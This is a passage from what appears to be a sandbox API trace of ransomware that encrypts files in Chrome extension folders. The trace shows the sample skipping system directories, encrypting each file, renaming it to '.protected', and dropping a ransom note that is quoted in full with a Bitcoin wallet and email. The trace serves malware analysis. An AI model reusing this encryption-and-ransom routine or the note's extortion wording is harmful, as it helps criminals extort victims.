lpOverlapped=0x0) returned 1 [0080.692] CloseHandle (hObject=0x164) returned 1 [0080.693] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.693] lstrcmpiW (lpString1="sr", lpString2="Windows") returned -1 [0080.693] lstrcmpiW (lpString1="sr", lpString2="Program Files") returned 1 [0080.693] lstrcmpiW (lpString1="sr", lpString2="Program Files (x86)") returned 1 [0080.693] lstrcmpiW (lpString1="sr", lpString2="$Recycle.bin") returned 1 [0080.693] lstrcmpiW (lpString1="sr", lpString2="System Volume Information") returned -1 [0080.693] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr") returned 141 [0080.693] lstrcmpW (lpString1="sr", lpString2=".") returned 1 [0080.693] lstrcmpW (lpString1="sr", lpString2="..") returned 1 [0080.693] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\*") returned 143 [0080.693] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.694] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.694] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.694] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.694] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.694] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.694] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | 
out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\.") returned 143 [0080.694] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.694] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.694] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.694] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.694] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.694] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.694] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.694] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\..") returned 144 [0080.694] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.694] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.694] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.694] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.694] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.694] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.694] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.694] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.694] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json") 
returned 155 [0080.694] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.694] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.694] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.694] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.694] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.695] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json") returned 155 [0080.695] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.695] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json") returned 155 [0080.695] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.695] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json") returned 155 [0080.695] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.695] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x104, lpOverlapped=0x0) returned 1 [0080.696] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffefc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.696] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x104, lpOverlapped=0x0) returned 1 [0080.696] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.696] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.696] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.696] CloseHandle (hObject=0x168) returned 1 [0080.696] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json.protected") returned 165 [0080.696] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json.protected")) returned 1 [0080.697] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.697] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.697] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\RESTORE_FILES.txt") returned 159 [0080.697] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.697] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.697] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.698] lstrlenA (lpString="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") returned 684 [0080.698] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.698] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.698] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0080.698] CloseHandle (hObject=0x164) returned 1 [0080.698] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.698] lstrcmpiW (lpString1="sv", lpString2="Windows") returned -1 [0080.698] lstrcmpiW (lpString1="sv", lpString2="Program Files") returned 1 [0080.698] lstrcmpiW (lpString1="sv", lpString2="Program Files (x86)") returned 1 [0080.698] lstrcmpiW (lpString1="sv", lpString2="$Recycle.bin") returned 1 [0080.698] lstrcmpiW (lpString1="sv", lpString2="System Volume Information") returned -1 [0080.698] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv") returned 141 [0080.698] lstrcmpW (lpString1="sv", lpString2=".") returned 1 [0080.698] lstrcmpW (lpString1="sv", lpString2="..") returned 1 [0080.698] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\*") returned 143 [0080.698] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.699] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.699] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.699] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.699] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.699] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.699] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | 
out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\.") returned 143 [0080.699] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.699] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.699] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.699] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.699] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.699] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.699] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.699] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\..") returned 144 [0080.699] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.699] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.699] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.699] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.699] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.699] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.699] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.699] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.699] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json") 
returned 155 [0080.699] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.699] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.699] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.699] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.699] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.700] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json") returned 155 [0080.700] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.700] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json") returned 155 [0080.700] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.700] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json") returned 155 [0080.700] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.700] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0080.700] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.701] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0080.701] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.701] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.701] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.701] CloseHandle (hObject=0x168) returned 1 [0080.701] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json.protected") returned 165 [0080.701] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json.protected")) returned 1 [0080.701] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.702] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.702] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\RESTORE_FILES.txt") returned 159 [0080.702] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.702] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.702] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.703] lstrlenA (lpString="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") returned 684 [0080.703] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.703] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.703] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0080.703] CloseHandle (hObject=0x164) returned 1 [0080.703] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.703] lstrcmpiW (lpString1="sw", lpString2="Windows") returned -1 [0080.703] lstrcmpiW (lpString1="sw", lpString2="Program Files") returned 1 [0080.703] lstrcmpiW (lpString1="sw", lpString2="Program Files (x86)") returned 1 [0080.703] lstrcmpiW (lpString1="sw", lpString2="$Recycle.bin") returned 1 [0080.703] lstrcmpiW (lpString1="sw", lpString2="System Volume Information") returned -1 [0080.703] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw") returned 141 [0080.703] lstrcmpW (lpString1="sw", lpString2=".") returned 1 [0080.703] lstrcmpW (lpString1="sw", lpString2="..") returned 1 [0080.703] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\*") returned 143 [0080.703] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.704] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.704] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.704] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.704] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.704] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.704] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | 
